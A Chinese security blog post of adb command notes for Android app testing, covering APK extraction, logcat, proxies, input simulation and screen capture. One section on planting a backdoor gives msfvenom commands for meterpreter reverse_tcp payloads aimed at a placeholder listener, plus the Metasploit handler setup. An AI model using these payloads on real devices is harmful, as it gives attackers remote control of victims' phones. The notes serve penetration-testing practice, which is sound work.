<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="à ō é's blog"><meta name="keywords" content="aoe,blog,网络安全,移动安全,app,Android,iOS,à ō é,等级保护,等保测评"><link rel="stylesheet" type="text/css" href="//fonts.loli.net/css?family=Source+Code+Pro"><link rel="stylesheet" type="text/css" href="/css/style.css?v=2.0.4"><link rel="stylesheet" type="text/css" href="/css/highlight.css?v=2.0.4"><link rel="Shortcut Icon" href="/favicon.ico"><link rel="bookmark" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><title>关于adb的一些常用命令小记 | à ō é</title></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">关于adb的一些常用命令小记</h1><a id="logo" href="/.">à ō é</a><p class="description">不 怨 天  不 尤 人</p></div><div id="nav-menu"><a href="/." class="current"><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div><div id="search-form"><div id="result-mask" class="hide"></div><label><input id="search-key" type="text" autocomplete="off" placeholder="搜索"></label><div id="result-wrap" class="hide"><div id="search-result"></div></div><div class="hide"><template id="search-tpl"><div class="item"><a href="/{path}" title="{title}"><div class="title">{title}</div><div class="time">{date}</div><div class="tags">{tags}</div></a></div></template></div></div></div><div id="layout" class="layout-g"><div class="layout-l"><div class="content_container"><div class="post"><h1 class="post-title">关于adb的一些常用命令小记</h1><div class="post-meta"><a href="/2021/06/18/关于adb的一些常用命令小记/#comments" class="comment-count"></a><p><span class="date">Jun 18, 2021</span><span><a href="/categories/Android逆向/" class="category">Android逆向</a></span><span><i id="busuanzi_container_page_pv"><i id="busuanzi_value_page_pv"></i><i>点击</i></i></span></p></div><div class="post-content"><p>在做APP安全测试时（Android端）除了业务逻辑，也会经常要用一些adb命令，在此记录一下。</p>
<blockquote>
<p>adb下载地址</p>
<p><a href="https://adbshell.com/downloads" target="_blank" rel="noopener">https://adbshell.com/downloads</a></p>
</blockquote>
<h2 id="一些思路小记"><a href="#一些思路小记" class="headerlink" title="一些思路小记"></a>一些思路小记</h2><h3 id="1、提取apk文件"><a href="#1、提取apk文件" class="headerlink" title="1、提取apk文件"></a>1、提取apk文件</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># <span class="number">1</span>.获取当前屏幕上正在运行的APP的包名和类名(获取包名)</span><br><span class="line">adb shell dumpsys window | grep mCurrentFocus</span><br><span class="line"></span><br><span class="line"># <span class="number">2</span>.获取某个应用的apk路径</span><br><span class="line">adb shell pm <span class="built_in">path</span> &lt;pkg&gt;</span><br><span class="line"></span><br><span class="line"># <span class="number">3</span>.让adb获得root权限</span><br><span class="line">adb root</span><br><span class="line"></span><br><span class="line"># <span class="number">4</span>.提取apk文件到本地</span><br><span class="line">adb pull &lt;apk-<span class="built_in">path</span>&gt; &lt;local-<span class="built_in">path</span>&gt; </span><br><span class="line"># 如提取到当前目录(./也可以省略不写)：</span><br><span class="line">adb pull /system/priv-app/Settings/Settings.apk ./</span><br></pre></td></tr></table></figure>

<h3 id="2、查看logcat日志信息"><a href="#2、查看logcat日志信息" class="headerlink" title="2、查看logcat日志信息"></a>2、查看logcat日志信息</h3><p>首推 <strong>Android Device Monitor</strong>，很好用（界面化工具），可进行日志筛选、查找、导出等。</p>
<p><em>Tips:Android Device Monitor 已在Android Studio 3.1及以上版本中弃用，可自行下载Android SDK工具包。</em></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> Android Device Monitor启动脚本路径</span></span><br><span class="line">&lt;android-sdk-path&gt;\tools\monitor.bat</span><br></pre></td></tr></table></figure>

<p>然后就是通过命令来看了。</p>
<ol>
<li>查看指定包名的logcat日志</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 打印指定包名的logcat日志</span></span><br><span class="line">adb logcat | findstr &lt;pkg&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash"> 输出到本地文件，按 CRTAL+C 停止。</span></span><br><span class="line">adb logcat | findstr pkg &gt; &lt;path/file-name&gt;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>查看指定进程号的logcat日志</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 根据包名、服务名查找PID</span></span><br><span class="line">adb shell ps |grep &lt;关键字，可以是包名，服务名等&gt;</span><br><span class="line"><span class="meta">#</span><span class="bash"> 查看指定进程号的logcat日志</span></span><br><span class="line">adb logcat --pid=&lt;PID&gt;</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>打印从某个时间点开始的系统日志</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">adb logcat -T "月-日 00:00:00.000" &gt; &lt;path/file-name&gt;</span><br><span class="line"><span class="meta">#</span><span class="bash"> 如从6月10日12点这个时间点开始打印logcat日志</span></span><br><span class="line">adb logcat -T "06-10 12:00:00.000" &gt; logcat-06101200.txt</span><br></pre></td></tr></table></figure>

<blockquote>
<p>Android logcat命令详解</p>
<p><a href="https://www.cnblogs.com/jianxu/p/5468839.html" target="_blank" rel="noopener">https://www.cnblogs.com/jianxu/p/5468839.html</a></p>
<p>使用adb logcat命令显示Android设备上的Log日志</p>
<p><a href="https://blog.csdn.net/wenzhi20102321/article/details/81058196" target="_blank" rel="noopener">https://blog.csdn.net/wenzhi20102321/article/details/81058196</a></p>
</blockquote>
<h3 id="3、启动APP的方法"><a href="#3、启动APP的方法" class="headerlink" title="3、启动APP的方法"></a>3、启动APP的方法</h3><ol>
<li><p>手动点击屏幕上的APP图标</p>
</li>
<li><p>借助frida强制重启APP（使用于某些场景，如没办法去点击APP图标）</p>
</li>
</ol>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">frida -U --no-<span class="built_in">pause</span> -f &lt;pkg&gt; # 只需知道包名即可，不需要知道类名</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>使用adb命令启动APP</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">adb shell am start -n &lt;pkg&gt;/&lt;activity-name&gt;</span><br><span class="line">adb shell am start -n  &lt;pkg&gt;/.MainActivity</span><br></pre></td></tr></table></figure>

<h3 id="4、植入木马-后门"><a href="#4、植入木马-后门" class="headerlink" title="4、植入木马/后门"></a>4、植入木马/后门</h3><ol>
<li>查看手机CPU架构。</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell cat /proc/cpuinfo</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>使用msfvenom来生成木马/后门文件。</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a aarch64 --platform Linux -p linux/aarch64/meterperter_reverse_tcp -f elf LHOST=x.x.x.x LPORT=444 -o payload</span><br><span class="line"></span><br><span class="line">msfvenom -p android/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 R &gt; shell.apk</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><p>然后放到手机中（命令略）。</p>
</li>
<li><p>打开msf，进行监听。</p>
</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload android/meterpreter/reverse_tcp</span><br><span class="line">set LHOST kali-ip</span><br><span class="line">show options</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<ol start="5">
<li><p>去手机中运行木马/后门程序（使用shell或点击app）。</p>
</li>
<li><p>再去msf中看是否上线。</p>
</li>
</ol>
<p><em>Tips：也可以安装其他木马/后门APP或远程协助类的APP</em></p>
<blockquote>
<p>MSF入侵安卓手机</p>
<p><a href="https://www.cnblogs.com/hkleak/p/4852057.html" target="_blank" rel="noopener">https://www.cnblogs.com/hkleak/p/4852057.html</a></p>
</blockquote>
<h2 id="一些常用的adb命令"><a href="#一些常用的adb命令" class="headerlink" title="一些常用的adb命令"></a>一些常用的adb命令</h2><h3 id="传文件"><a href="#传文件" class="headerlink" title="传文件"></a>传文件</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">adb pull &lt;手机路径&gt;  &lt;本机路径&gt;  # 从手机中拉取信息到本地电脑上</span><br><span class="line">adb push &lt;本机路径&gt;  &lt;手机路径&gt;  # 从本地电脑推送信息到手机上</span><br><span class="line">adb push 1.apk  /data/local/tmp # 举例</span><br></pre></td></tr></table></figure>

<h3 id="adb执行某些操作"><a href="#adb执行某些操作" class="headerlink" title="adb执行某些操作"></a>adb执行某些操作</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#打开系统设置界面</span><br><span class="line">adb shell am <span class="built_in">start</span> -n com.android.settings/com.android.settings.Settings</span><br><span class="line"></span><br><span class="line">#打开浏览器（Android在adb shell里打开某个APP）</span><br><span class="line">am <span class="built_in">start</span> -n com.android.browser/com.android.browser.BrowserActivity</span><br><span class="line"></span><br><span class="line">#调用浏览器打开某个网站:</span><br><span class="line">am <span class="built_in">start</span> -a android.intent.action.VIEW -d https://www.baidu.com</span><br><span class="line"></span><br><span class="line">#发短信</span><br><span class="line">adb shell am <span class="built_in">start</span> -a android.intent.action.SENDTO -d sms:<span class="number">10010</span> --es sms_body  hello</span><br></pre></td></tr></table></figure>

<h3 id="adb配置wifi连接"><a href="#adb配置wifi连接" class="headerlink" title="adb配置wifi连接"></a>adb配置wifi连接</h3><p>保持手机电脑在同一个wifi。先用数据线连电脑，执行下面命令后即可拔掉数据线。</p>
<p>另推荐一个APP（可实现此功能）：<strong>wifiadb</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">adb shell ifconfig wanl0 # 在连接数据线的情况下查看手机IP地址</span><br><span class="line">adb tcpip 5555 # 设置端口转发</span><br><span class="line">adb connect &lt;phone-ip&gt; #连接设备，此时可以拔掉数据线了</span><br><span class="line">adb devices # 验证是否连接成功</span><br><span class="line"></span><br><span class="line">adb disconnect &lt;phone-ip:port&gt; # 断开连接</span><br></pre></td></tr></table></figure>

<blockquote>
<p>adb通过wifi连接android设备</p>
<p><a href="https://blog.csdn.net/wlly1/article/details/54912079" target="_blank" rel="noopener">https://blog.csdn.net/wlly1/article/details/54912079</a></p>
</blockquote>
<h3 id="adb设置系统代理"><a href="#adb设置系统代理" class="headerlink" title="adb设置系统代理"></a>adb设置系统代理</h3><p><strong>设置代理</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">adb shell settings put global http_proxy &lt;代理IP地址:端口号&gt;</span><br><span class="line">adb shell settings put global http_proxy 192.168.53.99:8989 # 举例</span><br></pre></td></tr></table></figure>

<p><strong>移除代理</strong></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell settings delete global http_proxy &amp;&amp; adb shell settings delete global global_http_proxy_host &amp;&amp; adb shell settings delete global global_http_proxy_port &amp;&amp; adb reboot</span><br></pre></td></tr></table></figure>

<p>注意：移除代理后要重启手机才能生效。设置代理可以多次设置，立即生效（即覆盖）。</p>
<p><strong>使用第三方apk</strong><br>AndroidProxySetter工具可以帮助我们使用adb命令可以快速进行wifi代理的设置和清除<br>GitHub地址：</p>
<p><a href="https://github.com/jpkrause/AndroidProxySetter" target="_blank" rel="noopener">https://github.com/jpkrause/AndroidProxySetter</a><br>下好apk后，安装到手机</p>
<p>adb install proxy-setter-debug-0.2.1.apk</p>
<p><strong>设置代理</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell am start -n tk.elevenk.proxysetter/.MainActivity -e host 代理IP地址 -e port 端口号 -e ssid WIFI名称 -e reset-wifi true -e key WIFI密码</span><br></pre></td></tr></table></figure>

<p>如：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell am start -n tk.elevenk.proxysetter/.MainActivity -e host 127.0.0.1 -e port 8888 -e ssid YOUR-WIFI-NAME -e reset-wifi true -e key YOUR-WIFI-PASSWORD</span><br></pre></td></tr></table></figure>

<blockquote>
<p>adb 修改手机代理方式</p>
<p><a href="https://blog.csdn.net/userwyh/article/details/82430665" target="_blank" rel="noopener">https://blog.csdn.net/userwyh/article/details/82430665</a></p>
</blockquote>
<h3 id="adb命令关闭指定APP"><a href="#adb命令关闭指定APP" class="headerlink" title="adb命令关闭指定APP"></a>adb命令关闭指定APP</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell am force-stop &lt;pkg&gt;</span><br></pre></td></tr></table></figure>

<h3 id="查看进程"><a href="#查看进程" class="headerlink" title="查看进程"></a>查看进程</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#查找某个进程</span><br><span class="line">adb shell ps|<span class="built_in">findstr</span> &lt;pkg&gt;</span><br><span class="line"></span><br><span class="line">#杀死某个进程</span><br><span class="line">adb shell am force-stop &lt;pkg&gt;</span><br></pre></td></tr></table></figure>

<h3 id="文本输入"><a href="#文本输入" class="headerlink" title="文本输入"></a>文本输入</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell input text '<span class="number">123</span>'</span><br></pre></td></tr></table></figure>

<h3 id="按键输入"><a href="#按键输入" class="headerlink" title="按键输入"></a>按键输入</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 返回键</span><br><span class="line">adb shell input keyevent BACK</span><br><span class="line"># 返回键</span><br><span class="line">adb shell input keyevent <span class="number">4</span></span><br><span class="line"># 电源键</span><br><span class="line">adb shell input keyevent <span class="number">26</span></span><br><span class="line"># HOME 键</span><br><span class="line">adb shell input keyevent <span class="number">3</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>adb命令模拟按键事件 KeyCode</p>
<p><a href="https://blog.csdn.net/jlminghui/article/details/39268419" target="_blank" rel="noopener">https://blog.csdn.net/jlminghui/article/details/39268419</a></p>
</blockquote>
<h3 id="模拟屏幕点击"><a href="#模拟屏幕点击" class="headerlink" title="模拟屏幕点击"></a>模拟屏幕点击</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># x，y为坐标位置</span><br><span class="line">adb shell input tap &lt;X&gt; &lt;Y&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>ADB——模拟手机按键输入</p>
<p><a href="https://www.cnblogs.com/zhuminghui/p/10457755.html" target="_blank" rel="noopener">https://www.cnblogs.com/zhuminghui/p/10457755.html</a></p>
</blockquote>
<h3 id="截屏和录屏"><a href="#截屏和录屏" class="headerlink" title="截屏和录屏"></a>截屏和录屏</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">截屏并保存在手机上的指定路径</span></span><br><span class="line">adb shell screencap -p /storage/emulated/0/DCIM/screenhot.png</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash">截屏并保存在电脑上的指定路径</span></span><br><span class="line">adb </span><br><span class="line">adb exec-out screencap -p &gt; C:\Users\administrator\Desktop\screen.png</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash">录屏60秒并保存在手机上的指定路径</span></span><br><span class="line">adb shell screenrecord --bit-rate 60 /sdcard/demo.mp4</span><br><span class="line"></span><br><span class="line">adb shell screenrecord --bit-rate 1000000 --size 2348x1080 /sdcard/demo.mp4</span><br></pre></td></tr></table></figure>

<p>adb 截屏和录屏命令</p>
<p><a href="https://blog.csdn.net/gdutxiaoxu/article/details/69802895" target="_blank" rel="noopener">https://blog.csdn.net/gdutxiaoxu/article/details/69802895</a></p>
<p>app自动化–Android使用adb命令录屏(上)</p>
<p><a href="https://blog.csdn.net/atnanyang/article/details/86479449" target="_blank" rel="noopener">https://blog.csdn.net/atnanyang/article/details/86479449</a></p>
<h2 id="其它"><a href="#其它" class="headerlink" title="其它"></a>其它</h2><h3 id="sqlite3常用命令"><a href="#sqlite3常用命令" class="headerlink" title="sqlite3常用命令"></a>sqlite3常用命令</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#打开某个数据库，查看指定表名的内容。</span><br><span class="line">sqlite3 xxx.db</span><br><span class="line">.tables</span><br><span class="line">.<span class="built_in">mode</span> column</span><br><span class="line">select * from x;</span><br></pre></td></tr></table></figure>

<h3 id="dex2jar"><a href="#dex2jar" class="headerlink" title="dex2jar"></a>dex2jar</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#dex转jar</span><br><span class="line">d2j-dex2jar.bat xxx.dex</span><br><span class="line">d2j-dex2jar xxx.dex</span><br></pre></td></tr></table></figure>

<p><strong>Tips</strong>：使用<code>jdax</code>也可直接打开<code>.dex</code>文件，支持这些文件后缀：<code>.apk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab</code>。</p>
<blockquote>
<p>dex转jar , jar转dex , class转java</p>
<p><a href="https://blog.csdn.net/maydata/article/details/53466126" target="_blank" rel="noopener">https://blog.csdn.net/maydata/article/details/53466126</a></p>
</blockquote>
</div><div class="post-copyright"><blockquote><p>原文作者: à ō é</p><p>原文链接: <a href="https://laoel.github.io/2021/06/18/关于adb的一些常用命令小记/">https://laoel.github.io/2021/06/18/关于adb的一些常用命令小记/</a></p><p>版权声明: 转载请注明出处(必须保留原文作者署名原文链接)</p></blockquote></div><div class="tags"><a href="/tags/adb/">adb</a></div><div class="post-share"><div class="social-share"><span>分享到:</span></div></div><div class="post-nav"><a href="/2020/12/05/商用密码介绍/" class="next">商用密码介绍</a></div><div id="comments"></div></div></div></div><div class="layout-r"><div id="sidebar"><div class="search-pla"></div><div id="toc" class="widget"><div class="widget-title"><i class="fa fa-fei">文章目录</i></div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#一些思路小记"><span class="toc-text">一些思路小记</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1、提取apk文件"><span class="toc-text">1、提取apk文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2、查看logcat日志信息"><span class="toc-text">2、查看logcat日志信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3、启动APP的方法"><span class="toc-text">3、启动APP的方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4、植入木马-后门"><span class="toc-text">4、植入木马/后门</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#一些常用的adb命令"><span class="toc-text">一些常用的adb命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#传文件"><span class="toc-text">传文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#adb执行某些操作"><span class="toc-text">adb执行某些操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#adb配置wifi连接"><span class="toc-text">adb配置wifi连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#adb设置系统代理"><span class="toc-text">adb设置系统代理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#adb命令关闭指定APP"><span class="toc-text">adb命令关闭指定APP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#查看进程"><span class="toc-text">查看进程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#文本输入"><span class="toc-text">文本输入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#按键输入"><span class="toc-text">按键输入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#模拟屏幕点击"><span class="toc-text">模拟屏幕点击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#截屏和录屏"><span class="toc-text">截屏和录屏</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#其它"><span class="toc-text">其它</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sqlite3常用命令"><span class="toc-text">sqlite3常用命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dex2jar"><span class="toc-text">dex2jar</span></a></li></ol></li></ol></div><div class="widget"><div class="widget-title"><i class="fa fa-xie"> 最新文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/06/18/关于adb的一些常用命令小记/">关于adb的一些常用命令小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/05/商用密码介绍/">商用密码介绍</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/08/一文教你搞定右键菜单的管理/">一文教你搞定右键菜单的管理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/29/Windows安全加固/">Windows安全加固</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/12/MySQL安全加固/">MySQL安全加固</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/08/24/iOS安全之iOS逆向环境准备/">iOS安全之iOS逆向环境准备</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/08/04/XSS-Payload/">XSS-Payload</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/01/安全圈里的公众号推荐/">安全圈里的公众号推荐</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/28/Apache安全加固/">Apache安全加固</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/16/等保2-0-安全通信网络/">等保2.0-安全通信网络</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-gui"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Android逆向/">Android逆向</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Payload/">Payload</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/iOS安全/">iOS安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/markdown/">markdown</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/兴趣爱好/">兴趣爱好</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/安全加固/">安全加固</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/安装配置/">安装配置</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/密码学/">密码学</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂文/">杂文</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞复现/">漏洞复现</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/等保测评/">等保测评</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/长期更新/">长期更新</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/面试/">面试</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-biao"> 标签</i></div><div class="tagcloud"><a href="/tags/Android漏洞/" style="font-size: 15px;">Android漏洞</a> <a href="/tags/修复建议/" style="font-size: 15px;">修复建议</a> <a href="/tags/漏洞库/" style="font-size: 15px;">漏洞库</a> <a href="/tags/测试指南/" style="font-size: 15px;">测试指南</a> <a href="/tags/apache/" style="font-size: 15px;">apache</a> <a href="/tags/加固/" style="font-size: 15px;">加固</a> <a href="/tags/中间件/" style="font-size: 15px;">中间件</a> <a href="/tags/Payload/" style="font-size: 15px;">Payload</a> <a href="/tags/XSS/" style="font-size: 15px;">XSS</a> <a href="/tags/CVE/" style="font-size: 15px;">CVE</a> <a href="/tags/CFOP公式/" style="font-size: 15px;">CFOP公式</a> <a href="/tags/魔方/" style="font-size: 15px;">魔方</a> <a href="/tags/web漏洞/" style="font-size: 15px;">web漏洞</a> <a href="/tags/windows/" style="font-size: 15px;">windows</a> <a href="/tags/安全加固/" style="font-size: 15px;">安全加固</a> <a href="/tags/mysql/" style="font-size: 15px;">mysql</a> <a href="/tags/iOS逆向/" style="font-size: 15px;">iOS逆向</a> <a href="/tags/移动安全/" style="font-size: 15px;">移动安全</a> <a href="/tags/md/" style="font-size: 15px;">md</a> <a href="/tags/markdown/" style="font-size: 15px;">markdown</a> <a href="/tags/语法介绍/" style="font-size: 15px;">语法介绍</a> <a href="/tags/adb/" style="font-size: 15px;">adb</a> <a href="/tags/小技巧/" style="font-size: 15px;">小技巧</a> <a href="/tags/环境搭建/" style="font-size: 15px;">环境搭建</a> <a href="/tags/LNMP/" style="font-size: 15px;">LNMP</a> <a href="/tags/杂文/" style="font-size: 15px;">杂文</a> <a href="/tags/博客/" style="font-size: 15px;">博客</a> <a href="/tags/商用密码/" style="font-size: 15px;">商用密码</a> <a href="/tags/国密/" style="font-size: 15px;">国密</a> <a href="/tags/Apache/" style="font-size: 15px;">Apache</a> <a href="/tags/配置/" style="font-size: 15px;">配置</a> <a href="/tags/右键菜单/" style="font-size: 15px;">右键菜单</a> <a href="/tags/安装/" style="font-size: 15px;">安装</a> <a href="/tags/weblogic/" style="font-size: 15px;">weblogic</a> <a href="/tags/公众号/" style="font-size: 15px;">公众号</a> <a href="/tags/安全圈/" style="font-size: 15px;">安全圈</a> <a href="/tags/漏洞/" style="font-size: 15px;">漏洞</a> <a href="/tags/漏洞预警/" style="font-size: 15px;">漏洞预警</a> <a href="/tags/面试经验/" style="font-size: 15px;">面试经验</a> <a href="/tags/渗透测试/" style="font-size: 15px;">渗透测试</a> <a href="/tags/等保/" style="font-size: 15px;">等保</a> <a href="/tags/书籍推荐/" style="font-size: 15px;">书籍推荐</a> <a href="/tags/摘录/" style="font-size: 15px;">摘录</a> <a href="/tags/技术文章/" style="font-size: 15px;">技术文章</a> <a href="/tags/网络安全/" style="font-size: 15px;">网络安全</a> <a href="/tags/信息安全/" style="font-size: 15px;">信息安全</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-archive"> 归档</i></div><ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">六月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">十二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">十一月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">十月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">九月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">八月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">七月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">四月 